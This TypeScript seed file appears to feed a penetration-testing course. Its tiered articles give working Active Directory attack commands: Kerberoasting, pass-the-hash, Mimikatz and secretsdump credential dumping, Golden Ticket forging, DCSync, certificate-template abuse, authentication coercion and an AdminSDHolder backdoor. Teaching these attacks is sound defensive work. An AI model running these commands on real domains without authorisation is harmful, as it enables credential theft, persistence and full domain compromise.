import type { SeedArticle } from "./types";

export const AD_ARTICLES: SeedArticle[] = [
  {
    competencyId: "ad-fundamentals",
    depthTier: 0,
    title: "Active Directory Overview",
    recommendedLevel: 0,
    sections: [
      { heading: "What is Active Directory", content: `Active Directory (AD) is Microsoft's directory service for Windows domain networks. It stores information about users, computers, groups, and policies in a centralized, hierarchical database. Nearly every enterprise Windows environment relies on AD for authentication and authorization.\n\nFor penetration testers, AD is one of the highest-value targets — compromising a Domain Controller means controlling every account and machine in the domain.`, sortOrder: 0 },
      { heading: "Why AD matters for security", content: `- Over 95% of Fortune 500 companies use Active Directory\n- A single misconfiguration can lead to full domain compromise\n- AD attacks chain together: enumerate → credential access → lateral movement → domain admin\n- Kerberos (AD's authentication protocol) has fundamental design weaknesses that attackers exploit\n- Tools like BloodHound can map attack paths across thousands of objects in minutes`, sortOrder: 1 },
      { heading: "Key vocabulary", content: `- **Domain Controller (DC)**: Server running AD DS (Domain Services), handles authentication\n- **Domain**: A logical grouping of objects (users, computers) sharing a common namespace\n- **Forest**: Collection of one or more domain trees sharing a common schema\n- **Kerberos**: The primary authentication protocol in AD\n- **NTLM**: Legacy authentication protocol, still widely used\n- **Group Policy (GPO)**: Centralized configuration management\n- **LDAP**: Lightweight Directory Access Protocol — how clients query AD\n- **SPN**: Service Principal Name — identifies a service instance for Kerberos`, sortOrder: 2 },
      { heading: "Sources", content: `- Microsoft AD DS documentation: learn.microsoft.com/en-us/windows-server/identity/ad-ds\n- MITRE ATT&CK: Credential Access (TA0006), Lateral Movement (TA0008)\n- Sean Metcalf, adsecurity.org`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "ad-fundamentals",
    depthTier: 1,
    title: "Active Directory Basics",
    recommendedLevel: 1,
    sections: [
      { heading: "AD structure and objects", content: `AD organizes objects in a hierarchy:\n\n\`\`\`\nForest: corp.local\n└── Domain: corp.local\n    ├── OU=Users\n    │   ├── CN=John Smith\n    │   └── CN=Jane Doe\n    ├── OU=Computers\n    │   ├── CN=WS01\n    │   └── CN=WS02\n    ├── OU=Servers\n    │   └── CN=DC01\n    └── OU=Groups\n        ├── CN=Domain Admins\n        └── CN=IT Staff\n\`\`\`\n\nKey object types:\n- **User**: Account with credentials, group memberships, attributes\n- **Computer**: Machine account (also has a password, rotated every 30 days)\n- **Group**: Security or distribution group (nesting creates complex permission chains)\n- **Organizational Unit (OU)**: Container for organizing objects and applying GPOs`, sortOrder: 0 },
      { heading: "Kerberos authentication flow", content: `\`\`\`mermaid\nsequenceDiagram\n    participant U as User\n    participant KDC as KDC (DC)\n    participant S as Service\n    U->>KDC: AS-REQ (username + timestamp encrypted with password hash)\n    KDC->>U: AS-REP (TGT encrypted with krbtgt hash)\n    U->>KDC: TGS-REQ (TGT + requested service SPN)\n    KDC->>U: TGS-REP (Service Ticket encrypted with service account hash)\n    U->>S: AP-REQ (Service Ticket)\n    S->>U: AP-REP (optional mutual auth)\n\`\`\`\n\nKey insight: the KDC trusts the TGT because only it knows the krbtgt hash. If an attacker obtains the krbtgt hash, they can forge TGTs for any user — this is a **Golden Ticket** attack.`, sortOrder: 1 },
      { heading: "Basic enumeration commands", content: `\`\`\`bash\n# From a domain-joined Windows machine\nnet user /domain\nnet group "Domain Admins" /domain\nnltest /dclist:corp.local\n\n# PowerShell AD module\nGet-ADUser -Filter * -Properties *\nGet-ADGroup -Filter * | Select Name\nGet-ADComputer -Filter * -Properties OperatingSystem\n\n# From Linux with credentials\ncrackmapexec smb dc01.corp.local -u user -p password --users\ncrackmapexec smb dc01.corp.local -u user -p password --groups\nldapsearch -x -H ldap://dc01.corp.local -D "user@corp.local" -w password -b "DC=corp,DC=local"\n\`\`\``, sortOrder: 2 },
      { heading: "NTLM vs Kerberos", content: `| Feature | NTLM | Kerberos |\n|---------|------|----------|\n| Protocol | Challenge-response | Ticket-based |\n| Uses DC | No (can be standalone) | Yes (requires KDC) |\n| Mutual auth | No | Yes |\n| Default in AD | Fallback | Primary |\n| Relay attacks | Vulnerable | Not directly |\n| Pass-the-hash | Yes | Via overpass-the-hash |\n\nNTLM is still used as a fallback when Kerberos isn't available (IP-based access, cross-forest, legacy systems). NTLM relay attacks remain one of the most effective AD attack vectors.`, sortOrder: 3 },
      { heading: "Sources", content: `- Microsoft Kerberos documentation\n- RFC 4120 (The Kerberos Network Authentication Service V5)\n- Sean Metcalf, "Attack and Defense of Active Directory" (adsecurity.org)`, sortOrder: 4 },
    ],
  },
  {
    competencyId: "ad-fundamentals",
    depthTier: 2,
    title: "Active Directory Attacks in Depth",
    recommendedLevel: 2,
    sections: [
      { heading: "BloodHound for attack path mapping", content: `BloodHound maps AD relationships to find attack paths to Domain Admin:\n\n\`\`\`bash\n# Collect data with SharpHound (from domain-joined machine)\n.\\SharpHound.exe -c All --zipfilename data.zip\n\n# Or with bloodhound-python (from Linux)\nbloodhound-python -d corp.local -u user -p password -c All -ns DC_IP\n\n# Import into BloodHound GUI\n# Key queries:\n# - "Shortest Path to Domain Admins"\n# - "Find Principals with DCSync Rights"\n# - "Find Computers where Domain Users are Local Admin"\n\`\`\`\n\nBloodHound reveals non-obvious paths: User A is member of Group B, which has GenericAll on User C, who is a member of Domain Admins. Each step is exploitable.`, sortOrder: 0 },
      { heading: "Kerberoasting", content: `Kerberoasting requests service tickets for accounts with SPNs, then cracks them offline:\n\n\`\`\`bash\n# Request service tickets (Impacket)\nGetUserSPNs.py corp.local/user:password -dc-ip DC_IP -request\n\n# PowerShell\nRequest-SPNTicket -SPN "MSSQLSvc/db01.corp.local:1433"\n\n# With Rubeus\nRubeus.exe kerberoast /outfile:hashes.txt\n\n# Crack with hashcat\nhashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt\n\`\`\`\n\nWhy it works: the service ticket is encrypted with the service account's NTLM hash. If the password is weak, it can be cracked offline — no failed login attempts, no account lockout.`, sortOrder: 1 },
      { heading: "AS-REP Roasting", content: `Targets accounts with "Do not require Kerberos preauthentication" set:\n\n\`\`\`bash\n# Find vulnerable accounts\nGetNPUsers.py corp.local/ -dc-ip DC_IP -usersfile users.txt -no-pass\n\n# The AS-REP contains data encrypted with the user's hash\n# Crack with hashcat\nhashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt\n\`\`\`\n\nLess common than Kerberoasting, but doesn't require any credentials to execute — just a list of usernames.`, sortOrder: 2 },
      { heading: "Pass-the-Hash and overpass-the-hash", content: `\`\`\`bash\n# Pass-the-Hash with Impacket (NTLM)\npsexec.py corp.local/administrator@target -hashes :NTLM_HASH\nwmiexec.py corp.local/administrator@target -hashes :NTLM_HASH\nevil-winrm -i target -u administrator -H NTLM_HASH\n\n# Overpass-the-hash: use NTLM hash to request a Kerberos TGT\n# Rubeus\nRubeus.exe asktgt /user:admin /rc4:NTLM_HASH /ptt\n\n# Impacket\ngetTGT.py corp.local/admin -hashes :NTLM_HASH\nexport KRB5CCNAME=admin.ccache\npsexec.py corp.local/admin@target -k -no-pass\n\`\`\``, sortOrder: 3 },
      { heading: "Credential dumping", content: `\`\`\`bash\n# Mimikatz (on compromised Windows host)\nmimikatz# privilege::debug\nmimikatz# sekurlsa::logonpasswords  # dump plaintext & hashes from memory\nmimikatz# lsadump::sam             # dump local SAM database\nmimikatz# lsadump::dcsync /user:krbtgt  # DCSync to get krbtgt hash\n\n# From Linux with Impacket\nsecretsdump.py corp.local/admin:password@DC_IP\n# Dumps: SAM, LSA secrets, NTDS.dit (all domain hashes)\n\n# LSASS dump (for offline analysis)\nprocdump64.exe -accepteula -ma lsass.exe lsass.dmp\n# Then: mimikatz# sekurlsa::minidump lsass.dmp\n\`\`\``, sortOrder: 4 },
      { heading: "Sources", content: `- MITRE ATT&CK: Credential Dumping (T1003), Kerberoasting (T1558.003)\n- BloodHound documentation: bloodhound.readthedocs.io\n- Harmj0y's blog: blog.harmj0y.net\n- Impacket: github.com/fortra/impacket\n- Microsoft LAPS documentation`, sortOrder: 5 },
    ],
  },
  {
    competencyId: "ad-fundamentals",
    depthTier: 3,
    title: "Advanced Active Directory Attacks",
    recommendedLevel: 3,
    sections: [
      { heading: "Golden and Silver Tickets", content: `**Golden Ticket**: Forged TGT using the krbtgt hash — grants access as any user to any service in the domain.\n\n\`\`\`bash\n# Forge Golden Ticket with Impacket\nticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain corp.local Administrator\nexport KRB5CCNAME=Administrator.ccache\npsexec.py corp.local/Administrator@dc01 -k -no-pass\n\n# With Mimikatz\nkerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /ptt\n\`\`\`\n\n**Silver Ticket**: Forged service ticket using a service account's hash — grants access to that specific service only. Harder to detect (never touches the DC).\n\n\`\`\`bash\nticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-... -domain corp.local -spn MSSQLSvc/db01.corp.local Administrator\n\`\`\``, sortOrder: 0 },
      { heading: "DCSync attack", content: `DCSync abuses the Directory Replication Service protocol to request password hashes directly from the DC:\n\n\`\`\`bash\n# Requires: DS-Replication-Get-Changes + DS-Replication-Get-Changes-All\n# (Domain Admins have this by default)\n\n# Dump all hashes\nsecretsdump.py corp.local/admin:password@dc01.corp.local\n\n# Dump specific user\nsecretsdump.py corp.local/admin:password@dc01.corp.local -just-dc-user krbtgt\n\n# With Mimikatz\nlsadump::dcsync /domain:corp.local /user:krbtgt\n\`\`\`\n\nDetection: monitor for DRS replication requests from non-DC sources (Event ID 4662 with specific GUIDs).`, sortOrder: 1 },
      { heading: "AD CS attacks (Certifried / ESC1-ESC8)", content: `Active Directory Certificate Services (AD CS) has become a major attack surface since the "Certified Pre-Owned" research:\n\n\`\`\`bash\n# Enumerate vulnerable templates with Certipy\ncertipy find -u user@corp.local -p password -dc-ip DC_IP\n\n# ESC1: Template allows SAN (Subject Alternative Name)\n# Request cert as Domain Admin\ncertipy req -u user@corp.local -p password -ca CORP-CA \\n  -template VulnTemplate -upn administrator@corp.local\n\n# Authenticate with the certificate\ncertipy auth -pfx administrator.pfx -dc-ip DC_IP\n# Returns the NTLM hash of administrator\n\`\`\`\n\nESC1-ESC8 cover different misconfiguration patterns: overly permissive templates, NTLM relay to the CA web enrollment, vulnerable certificate mapping.`, sortOrder: 2 },
      { heading: "Delegation attacks", content: `Kerberos delegation allows services to act on behalf of users:\n\n**Unconstrained delegation**: The service has access to the user's TGT — can impersonate them anywhere.\n\`\`\`bash\n# Find unconstrained delegation machines\nGet-ADComputer -Filter {TrustedForDelegation -eq $true}\n\n# Coerce auth from DC to this machine (e.g., PrinterBug)\nSpoolSample.exe DC01 ATTACKER_MACHINE\n# Capture the DC's TGT with Rubeus\nRubeus.exe monitor /interval:5 /nowrap\n\`\`\`\n\n**Constrained delegation**: Limited to specific services, but can be abused with S4U2Self + S4U2Proxy.\n\n**Resource-Based Constrained Delegation (RBCD)**: If you can modify msDS-AllowedToActOnBehalfOfOtherIdentity on a target, you can impersonate any user to that target.`, sortOrder: 3 },
      { heading: "Trust attacks and forest compromise", content: `AD trusts create authentication paths between domains:\n\n\`\`\`bash\n# Enumerate trusts\nnltest /domain_trusts /all_trusts\nGet-ADTrust -Filter *\n\n# Cross-domain attacks with SID History\n# If you have Domain Admin in child domain:\n# Forge a Golden Ticket with the Enterprise Admins SID\nticketer.py -nthash KRBTGT_HASH -domain-sid CHILD_SID \\n  -domain child.corp.local -extra-sid ENTERPRISE_ADMINS_SID Administrator\n\`\`\`\n\nA compromise of any domain in a forest can lead to forest-wide compromise through trust exploitation.`, sortOrder: 4 },
      { heading: "Sources", content: `- Will Schroeder & Lee Christensen, "Certified Pre-Owned" (SpecterOps)\n- Harmj0y, "A Guide to Attacking Domain Trusts"\n- MITRE ATT&CK: Golden Ticket (T1558.001), DCSync (T1003.006)\n- Certipy: github.com/ly4k/Certipy\n- Rubeus: github.com/GhostPack/Rubeus`, sortOrder: 5 },
    ],
  },
  {
    competencyId: "ad-fundamentals",
    depthTier: 4,
    title: "AD Red Team Operations",
    recommendedLevel: 4,
    sections: [
      { heading: "SCCM and MECM exploitation", content: `System Center Configuration Manager (SCCM/MECM) manages software deployment across the domain — and is frequently misconfigured:\n\n\`\`\`bash\n# Enumerate SCCM with SharpSCCM\nSharpSCCM.exe local\nSharpSCCM.exe get site-info\n\n# Recover Network Access Account (NAA) credentials\n# The NAA creds are deployed to all clients and often overprivileged\nSharpSCCM.exe get naa\n\n# Deploy an application to a specific device\n# (requires specific SCCM permissions)\nSharpSCCM.exe exec -d TARGET_DEVICE -p "C:\\\\Windows\\\\System32\\\\cmd.exe" -r "/c whoami > C:\\\\output.txt"\n\`\`\`\n\nSCCM has its own hierarchy of site servers, management points, and distribution points — each with potential misconfigurations.`, sortOrder: 0 },
      { heading: "LAPS and gMSA credential theft", content: `**LAPS** (Local Administrator Password Solution) stores randomized local admin passwords in AD:\n\n\`\`\`bash\n# Read LAPS password (requires ms-Mcs-AdmPwd read access)\nGet-ADComputer WS01 -Properties ms-Mcs-AdmPwd\ncrackmapexec ldap dc01.corp.local -u user -p password -M laps\n\n# LAPSv2 uses Windows LAPS with encrypted passwords\n# Decryption requires specific permissions\n\`\`\`\n\n**gMSA** (Group Managed Service Accounts) have passwords managed by AD:\n\n\`\`\`bash\n# Read gMSA password (if authorized)\nGet-ADServiceAccount -Identity gmsa_svc -Properties msDS-ManagedPassword\n\n# With Python (gMSADumper)\npython3 gMSADumper.py -u user -p password -d corp.local\n\`\`\``, sortOrder: 1 },
      { heading: "Shadow credentials and Key Trust", content: `Shadow Credentials abuse the msDS-KeyCredentialLink attribute (used for Windows Hello for Business):\n\n\`\`\`bash\n# Add shadow credentials to a target account\n# (requires write access to msDS-KeyCredentialLink)\npython3 pywhisker.py -d corp.local -u attacker -p password \\n  --target victim --action add\n\n# Authenticate using the added key\ncertipy auth -pfx victim.pfx -dc-ip DC_IP\n\n# With Whisker (C#)\nWhisker.exe add /target:victim\n\`\`\`\n\nThis is stealthier than password changes — the target user's password remains unchanged, and the added key can be removed after use.`, sortOrder: 2 },
      { heading: "AD persistence mechanisms", content: `Maintaining access after compromise:\n\n- **Golden Ticket**: Persists until krbtgt password is rotated twice\n- **DCSync permissions**: Grant a controlled account replication rights\n- **AdminSDHolder**: Modify the AdminSDHolder ACL — SDProp propagates permissions to all protected groups every 60 minutes\n- **Skeleton Key**: Patch LSASS on the DC to add a master password\n- **Custom SSP**: Load a Security Support Provider DLL into LSASS for credential logging\n- **GPO abuse**: Create/modify a GPO that grants persistence (scheduled tasks, startup scripts)\n\n\`\`\`bash\n# AdminSDHolder persistence\nAdd-DomainObjectAcl -TargetIdentity AdminSDHolder \\n  -PrincipalIdentity backdoor_user -Rights All\n# After 60 minutes, backdoor_user has full control over\n# Domain Admins, Enterprise Admins, etc.\n\`\`\``, sortOrder: 3 },
      { heading: "Sources", content: `- SpecterOps blog: specterops.io/blog\n- SharpSCCM: github.com/Mayyhem/SharpSCCM\n- Elad Shamir, "Shadow Credentials" research\n- Microsoft LAPS documentation\n- MITRE ATT&CK: Account Manipulation (T1098)`, sortOrder: 4 },
    ],
  },
  {
    competencyId: "ad-fundamentals",
    depthTier: 5,
    title: "Active Directory Internals",
    recommendedLevel: 5,
    sections: [
      { heading: "NTDS.dit internals", content: `NTDS.dit is the AD database (Extensible Storage Engine / JET Blue format). It stores all domain objects and their attributes, including password hashes.\n\n\`\`\`bash\n# Volume Shadow Copy extraction\nvssadmin create shadow /for=C:\ncopycmd.exe \\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy1\\\\Windows\\\\NTDS\\\\ntds.dit C:\\\\temp\\\\ntds.dit\nreg save HKLM\\\\SYSTEM C:\\\\temp\\\\system.hive\n\n# Extract hashes offline\nsecretsdump.py -ntds ntds.dit -system system.hive LOCAL\n\n# NTDS.dit structure:\n# datatable: main table with all objects\n# link_table: group memberships, linked attributes\n# sd_table: security descriptors\n# Each user object contains: unicodePwd (NT hash), supplementalCredentials\n\`\`\`\n\nThe PEK (Password Encryption Key) encrypts the stored hashes — it's derived from the SYSTEM hive's BOOTKEY, which is why you need both files.`, sortOrder: 0 },
      { heading: "Kerberos protocol internals", content: `Deep dive into Kerberos ticket structure:\n\n\`\`\`\nTGT structure:\n  Encrypted with krbtgt NTLM hash:\n    - Client principal name\n    - Authorization data (PAC)\n    - Session key\n    - Ticket lifetime\n    - Flags (forwardable, renewable, etc.)\n\nPAC (Privilege Attribute Certificate):\n  - User SID\n  - Group SIDs\n  - Logon info (username, domain, logon time)\n  - Server checksum (service key)\n  - KDC checksum (krbtgt key)\n  - Ticket checksum (added in Windows Server 2022 to prevent Bronze Bit)\n\`\`\`\n\nPAC validation: the service verifies the server checksum; historically, many services skipped KDC checksum verification, enabling Silver Ticket attacks. Windows Server 2022 added the Ticket checksum to harden against this.`, sortOrder: 1 },
      { heading: "DPAPI architecture", content: `DPAPI (Data Protection API) protects user secrets (saved passwords, certificates, Wi-Fi keys):\n\n\`\`\`\nMaster Key → derived from user password + SID\n  └── Encrypts individual secrets (credential blobs)\n  └── Backup: encrypted with domain's DPAPI backup key\n      └── Stored on DC, recoverable with Domain Admin\n\`\`\`\n\n\`\`\`bash\n# Decrypt DPAPI master keys (Mimikatz)\ndpapi::masterkey /in:master_key_file /sid:USER_SID /password:user_password\n\n# Decrypt credential files\ndpapi::cred /in:credential_file /masterkey:DECRYPTED_KEY\n\n# Domain backup key (requires DA)\nlsadump::backupkeys /system:dc01.corp.local /export\n# This key can decrypt ANY user's master keys — persistent domain-wide secret access\n\`\`\``, sortOrder: 2 },
      { heading: "AD security boundaries and trust model", content: `Microsoft's security boundary is the **forest**, not the domain. Key implications:\n\n- Domain Admins in a child domain can compromise the forest root via SID History\n- The krbtgt account is per-domain, but forest trusts use inter-realm TGTs\n- Schema and Configuration partitions are forest-wide — Schema Admin can modify the AD schema for all domains\n\nTrue isolation requires separate forests. Selective authentication on trust objects provides partial mitigation but is complex to maintain.\n\nAzure AD (Entra ID) integration adds new attack surfaces: Azure AD Connect sync, PHS (Password Hash Sync), PTA (Pass-through Authentication), and seamless SSO all create bridges between on-prem AD and the cloud.`, sortOrder: 3 },
      { heading: "Sources", content: `- Microsoft AD Technical Reference (learn.microsoft.com)\n- RFC 4120 (Kerberos V5)\n- Benjamin Delpy (Mimikatz author) blog and presentations\n- Charlie Clark & Andrew Schwartz, "DPAPI: Don't Put Adversaries in Peril... Immediately"\n- Microsoft "Securing Privileged Access" documentation`, sortOrder: 4 },
    ],
  },
];
